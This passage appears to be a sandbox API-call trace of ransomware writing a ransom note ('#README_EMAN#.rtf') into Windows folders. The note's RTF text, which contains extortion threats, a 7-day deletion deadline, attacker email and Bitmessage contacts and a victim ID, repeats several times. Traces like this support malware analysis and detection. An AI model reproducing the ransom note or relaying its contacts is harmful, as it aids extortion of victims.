g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.781] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.782] CloseHandle (hObject=0x284) returned 1 [0269.782] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\#readme_eman#.rtf")) returned 0xffffffff [0269.782] GetLastError () returned 0x2 [0269.782] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.782] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.782] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 